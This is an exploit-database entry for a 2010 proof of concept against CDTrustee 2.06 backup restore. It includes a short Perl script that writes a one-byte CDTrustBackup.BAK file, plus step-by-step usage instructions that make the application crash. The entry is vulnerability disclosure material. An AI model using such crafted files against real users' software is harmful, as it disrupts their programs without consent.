header-logo
Suggest Exploit
vendor:
CDTrustee
by:
anonymous
7,8
CVSS
HIGH
Local Crash
119
CWE
Product Name: CDTrustee
Affected Version From: 2.06
Affected Version To: 2.06
Patch Exists: NO
Related CWE: N/A
CPE: a:base40:cdtrustee:2.06
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: WinXP SP3 and Windows 7
2010

CDTrustee .BAK Local Crash POC

This exploit creates a file named CDTrustBackup.BAK with a single character 'A' and when the user tries to restore the backup file, the application crashes.

Mitigation:

The user should not restore any backup file from untrusted sources.
Source

Exploit-DB raw data:

# Exploit Title: CDTrustee .BAK Local Crash POC
# Date: March 30, 2010 
# Software Link: [http://www.base40.com/cdtDownload.html]
# Version: 2.06
# Tested on: WinXP SP3 and Windows 7
# Cost: 39.95 USD
# Author: [anonymous]
# Site: [http://www.setfreesecurity.com]
#
#
# Usage: Install software, run this script it will create
# CDTrustBackup.BAK, the file must be this name to restore.
# Click File -> Restore Backup File -> Locate CDTrustBackup.BAK
# Click OK -> OK -> OK -> Restore Complete -> OK
# Click on Playlist Menu At Top (Or almost any other Menu -> Sub Menu or button)
# Crash will occur, Thats all for now! 
#
# For to be carnally minded is death; but to be spiritually minded is life and peace.
# Rom. 8:6
# Greetz: GOD, TS aka br34dcrumbs, and This Coffee that I'm drinking
# Thanks to the Exploit-DB crew for the inspiration
#
#
#!/usr/bin/perl

print "Creating CDTrustBackup.BAK file\n";

my $bak = "\x41";
my $file = "CDTrustBackup.BAK";

open (FILE, ">$file");
print FILE "$bak";

print "Usage: File -> Restore Backup File -> Locate CDTrustBackup.BAK\n";
print "Click on Playlist Menu\n";
print "BOOM!\n"